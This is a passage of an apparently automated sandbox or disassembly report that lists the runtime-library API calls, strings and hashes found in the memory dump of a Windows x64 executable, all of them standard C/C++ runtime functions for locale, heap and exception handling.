                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00007FF61489ED60: GetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489ED6F
                                                                        • Part of subcall function 00007FF61489ED60: SetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489EE0D
                                                                      • GetLocaleInfoW.KERNEL32 ref: 00007FF6148A9758
                                                                      Similarity
                                                                      • API ID: ErrorLast$InfoLocale
                                                                      • String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00007FF61489ED60: GetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489ED6F
                                                                        • Part of subcall function 00007FF61489ED60: SetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489EE0D
                                                                      • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6148A9B27,?,00000000,00000092,?,?,00000000,?,00007FF61489C40D), ref: 00007FF6148A93DA
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                      • String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00007FF61489ED60: GetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489ED6F
                                                                        • Part of subcall function 00007FF61489ED60: SetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489EE0D
                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,00007FF6148A96A1), ref: 00007FF6148A992F
                                                                      Similarity
                                                                      • API ID: ErrorLast$InfoLocale
                                                                      • String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00007FF61489ED60: GetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489ED6F
                                                                        • Part of subcall function 00007FF61489ED60: SetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489EE0D
                                                                      • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6148A9AE3,?,00000000,00000092,?,?,00000000,?,00007FF61489C40D), ref: 00007FF6148A948A
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                      • String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF6148A0E91,?,?,?,?,?,?,?,?,00000000,00007FF6148A8988), ref: 00007FF6148A0ADB
                                                                      Similarity
                                                                      • API ID: EnumLocalesSystem
                                                                      • String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: 0
                                                                      • API String ID: 3215553584-4108050209
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 00007FF6148A497D
                                                                        • Part of subcall function 00007FF61489E56C: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF61489EF39,?,?,0000E117BC86E4D3,00007FF6148957A9,?,?,?,?,00007FF6148A507E,?,?,00000000), ref: 00007FF61489E5C1
                                                                        • Part of subcall function 00007FF61489E5E4: HeapFree.KERNEL32(?,?,00007FF61489D60F,00007FF6148A7DC0,?,?,?,00007FF6148A8143,?,?,0000E117BC86E4D3,00007FF6148A8688,?,?,?,00007FF6148A85BB), ref: 00007FF61489E5FA
                                                                        • Part of subcall function 00007FF61489E5E4: GetLastError.KERNEL32(?,?,00007FF61489D60F,00007FF6148A7DC0,?,?,?,00007FF6148A8143,?,?,0000E117BC86E4D3,00007FF6148A8688,?,?,?,00007FF6148A85BB), ref: 00007FF61489E60C
                                                                        • Part of subcall function 00007FF6148AB76C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6148AB79A
                                                                      Similarity
                                                                      • API ID: ErrorHeapLast$AllocateFree_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3806578645-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID: HeapProcess
                                                                      • String ID:
                                                                      • API String ID: 54951025-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID: ErrorLastNameTranslatetry_get_function$CodePageValid_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3827717455-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID: ErrorLast$CurrentFeatureInfoLocalePresentProcessProcessortry_get_function
                                                                      • String ID:
                                                                      • API String ID: 959782435-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID: ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 485612231-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A135B
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A137A
                                                                        • Part of subcall function 00007FF6148A0B08: GetProcAddress.KERNEL32(?,?,00000002,00007FF6148A0FAA,?,?,0000E117BC86E4D3,00007FF61489EF26,?,?,0000E117BC86E4D3,00007FF6148957A9), ref: 00007FF6148A0C60
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A1399
                                                                        • Part of subcall function 00007FF6148A0B08: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF6148A0FAA,?,?,0000E117BC86E4D3,00007FF61489EF26,?,?,0000E117BC86E4D3,00007FF6148957A9), ref: 00007FF6148A0BAB
                                                                        • Part of subcall function 00007FF6148A0B08: GetLastError.KERNEL32(?,?,00000002,00007FF6148A0FAA,?,?,0000E117BC86E4D3,00007FF61489EF26,?,?,0000E117BC86E4D3,00007FF6148957A9), ref: 00007FF6148A0BB9
                                                                        • Part of subcall function 00007FF6148A0B08: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF6148A0FAA,?,?,0000E117BC86E4D3,00007FF61489EF26,?,?,0000E117BC86E4D3,00007FF6148957A9), ref: 00007FF6148A0BFB
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A13B8
                                                                        • Part of subcall function 00007FF6148A0B08: FreeLibrary.KERNEL32(?,?,00000002,00007FF6148A0FAA,?,?,0000E117BC86E4D3,00007FF61489EF26,?,?,0000E117BC86E4D3,00007FF6148957A9), ref: 00007FF6148A0C34
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A13D7
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A13F6
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A1415
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A1434
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A1453
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A1472
                                                                      Similarity
                                                                      • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                      • API String ID: 3255926029-3252031757
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                      • String ID: bad locale name$false$true
                                                                      • API String ID: 4121308752-1062449267
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                      • String ID: bad locale name$false$true
                                                                      • API String ID: 3230409043-1062449267
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID: BlockUnwind$CatchExecutionFrameHandler3::Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 910750162-393685449
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: a72655217cf3ecb92df7e52be9117dae27c383bc9466b8c480e74d0a462121ca
                                                                      • Instruction ID: 00baf26d66a3ff4e54629c2d16991e3edf89b15abef6c1b0ac6ec5f91a898b2c
                                                                      • Opcode Fuzzy Hash: a72655217cf3ecb92df7e52be9117dae27c383bc9466b8c480e74d0a462121ca
                                                                      • Instruction Fuzzy Hash: 60C1D522A0DE8291EAA15F1990802BE7B91FF82FA4FA44131DA4D877E1CFFCE455C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 1386471777-1405518554
                                                                      • Opcode ID: 901312fe49ec335b73383531d66f1a1410a0777c902f06001bd849fedde32a84
                                                                      • Instruction ID: 056194217978237e32b6791f93fe5f9513c1808ea79abb1d9deb4dbe17a9bbe2
                                                                      • Opcode Fuzzy Hash: 901312fe49ec335b73383531d66f1a1410a0777c902f06001bd849fedde32a84
                                                                      • Instruction Fuzzy Hash: 5E518A22F09F828AEB54DBB4D4802AC33B4AF96B54F444135DE4DA7A56DF38E566E300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF614893816,?,?,?,00007FF614893514,?,?,?,?,00007FF6148901C5), ref: 00007FF6148935EB
                                                                      • GetLastError.KERNEL32(?,?,?,00007FF614893816,?,?,?,00007FF614893514,?,?,?,?,00007FF6148901C5), ref: 00007FF6148935F9
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF614893816,?,?,?,00007FF614893514,?,?,?,?,00007FF6148901C5), ref: 00007FF614893623
                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF614893816,?,?,?,00007FF614893514,?,?,?,?,00007FF6148901C5), ref: 00007FF614893669
                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF614893816,?,?,?,00007FF614893514,?,?,?,?,00007FF6148901C5), ref: 00007FF614893675
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: e28092d2a8754abe07b1813ff99e43b1423cfe1f6ef30b3aecc7f243d8151441
                                                                      • Instruction ID: b275d9a9da54f0717031b92d702e101c2e22938e7ac97e1d93673fee9c0ab3b4
                                                                      • Opcode Fuzzy Hash: e28092d2a8754abe07b1813ff99e43b1423cfe1f6ef30b3aecc7f243d8151441
                                                                      • Instruction Fuzzy Hash: C831F621B0AE4291EE92AB06D8846752394FF8EFB4F691534DE1D8B391EF3DE4409300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: 3e7576745228368b001dc45455e94fee6e3588f672ca8818725641a55fdbca99
                                                                      • Instruction ID: ce6abc917466ca0ef1dddc6199117e3774c7bb8a00c6653aa04822762de29f4d
                                                                      • Opcode Fuzzy Hash: 3e7576745228368b001dc45455e94fee6e3588f672ca8818725641a55fdbca99
                                                                      • Instruction Fuzzy Hash: 9C11B131618E4186E3909B16E89436962A0FF8AFF4F144234EA1DC37E4DFBCD5558740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: ByteCharMultiStringWide
                                                                      • String ID:
                                                                      • API String ID: 2829165498-0
                                                                      • Opcode ID: 13b951786706347ed30c3256fc5abe21f286629fc1ae3e690c436aa204d97c7e
                                                                      • Instruction ID: c0e7a8c3540408945d38150a63516799a304c9e163e1a05fce2808af0cd9cd0a
                                                                      • Opcode Fuzzy Hash: 13b951786706347ed30c3256fc5abe21f286629fc1ae3e690c436aa204d97c7e
                                                                      • Instruction Fuzzy Hash: 08818C32608F8286EBA09F11948037A76E1FB46FB8F540235EA5D97BD8DF7CE4068700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: 7b156b3fef83c02c43ea01abf10932abe987a5502ca0c24b17b6cf8582936866
                                                                      • Instruction ID: ea15d2f6611bb85ea23b172682fed41d2a488bfa89cf4f5976170dac9eaaf1bd
                                                                      • Opcode Fuzzy Hash: 7b156b3fef83c02c43ea01abf10932abe987a5502ca0c24b17b6cf8582936866
                                                                      • Instruction Fuzzy Hash: 06916F36A09E8282EBA4DB15E5803A977A1FB86FA4F144136DE4E83B65CF3DE445D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: 0c36f5b904ff30f730729e610fd2b9db094d15b04bf3cfd018bd2d334eecd3c9
                                                                      • Instruction ID: dba4bc4b2865538f29b91b22cb01a3f92d99dfb0634ef4a1af3bd425cb385a78
                                                                      • Opcode Fuzzy Hash: 0c36f5b904ff30f730729e610fd2b9db094d15b04bf3cfd018bd2d334eecd3c9
                                                                      • Instruction Fuzzy Hash: 6D814D36A09E8681EBA4DB15D5803B977A1FB86FA4F144132DE4E83BA9CF3DE445D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                      • String ID:
                                                                      • API String ID: 2081738530-0
                                                                      • Opcode ID: 95c4d019e337df2d27c4ae43ed6a612003bc9bb314e5d3e30eeae33b3e725eca
                                                                      • Instruction ID: d29b34cc44b3b4248c438e8122120ca9960356f7edf0b6f6d97fd4ba9686cdfc
                                                                      • Opcode Fuzzy Hash: 95c4d019e337df2d27c4ae43ed6a612003bc9bb314e5d3e30eeae33b3e725eca
                                                                      • Instruction Fuzzy Hash: 8B314F32E09E4381EF94EB15E8C01A9B3B1FB96FA4B080631DA5E837A5DF3CE4519700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                      • String ID:
                                                                      • API String ID: 2081738530-0
                                                                      • Opcode ID: e6b696b838180aeeb5d8db99cb0af4799342763c727a0bae7f89fe0791471731
                                                                      • Instruction ID: 5146fe0268e45f7e3d9271533ac601bbcbbbc3dc987c5fcacbe3810861e65622
                                                                      • Opcode Fuzzy Hash: e6b696b838180aeeb5d8db99cb0af4799342763c727a0bae7f89fe0791471731
                                                                      • Instruction Fuzzy Hash: 01314D32A19E4381EA95DB19F8C01A973A1FB96FA4F180231DA9E837A5DF3CE441D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                      • String ID:
                                                                      • API String ID: 2081738530-0
                                                                      • Opcode ID: 0d577c8873cb02b74a5d2540b211a9bb51c5b4332edea7e52b433389fe9cbf8c
                                                                      • Instruction ID: 877037f2b7ca5ab2afbc25410197b5937ca95a00daa213c4f42f6c784a1ae014
                                                                      • Opcode Fuzzy Hash: 0d577c8873cb02b74a5d2540b211a9bb51c5b4332edea7e52b433389fe9cbf8c
                                                                      • Instruction Fuzzy Hash: 2A317332A09E4381EB91EB19E8C01A97371FB95FA4F580631EA5E837A5DF3CE551D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                      • String ID:
                                                                      • API String ID: 2081738530-0
                                                                      • Opcode ID: 67b6caa33580ea919a601df496601060b12e44cfd7252ea35e28455147dcd832
                                                                      • Instruction ID: edcc3a32a8a86811301b0584c73d0da6c939683ec9068ba2efdabc6b8134c019
                                                                      • Opcode Fuzzy Hash: 67b6caa33580ea919a601df496601060b12e44cfd7252ea35e28455147dcd832
                                                                      • Instruction Fuzzy Hash: 31310F32A09E4381EF95EB15E8C01B963B1FB95FB4B180632DA5E837A9DE2CE5519700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                      • String ID:
                                                                      • API String ID: 2081738530-0
                                                                      • Opcode ID: bedeafbaec8adbaae1230ad5c0c7c0810852a28c19c79fa022dfbe0f8d58771f
                                                                      • Instruction ID: 93250536e682863dff99d234972d7eeb4ddd06c4f13c26a4f2baf78bd7a77155
                                                                      • Opcode Fuzzy Hash: bedeafbaec8adbaae1230ad5c0c7c0810852a28c19c79fa022dfbe0f8d58771f
                                                                      • Instruction Fuzzy Hash: 07318E2AA09E4341EA959B19F8C00B9A365EF92FB4F180231DA5E837E5DF6CE441E300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                      • String ID:
                                                                      • API String ID: 2081738530-0
                                                                      • Opcode ID: 014dc6ca548d231dec55e1923c3463b5928a751829b2780844626360de8ace3c
                                                                      • Instruction ID: e4a802571c055e3b4346a308cc0191f899a3ff42de94383a123264d10f6079bc
                                                                      • Opcode Fuzzy Hash: 014dc6ca548d231dec55e1923c3463b5928a751829b2780844626360de8ace3c
                                                                      • Instruction Fuzzy Hash: 3C318621A09E4741EE959B59E8C01B973A1EF96FB4F181231EB5D837A6DF3CE481D300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 3523768491-393685449
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2967684691-1405518554
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: AdjustPointer
                                                                      • String ID:
                                                                      • API String ID: 1740715915-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
                                                                      • String ID:
                                                                      • API String ID: 1087005451-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: $*
                                                                      • API String ID: 3215553584-3982473090
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2775327233-1405518554
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2775327233-1405518554
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
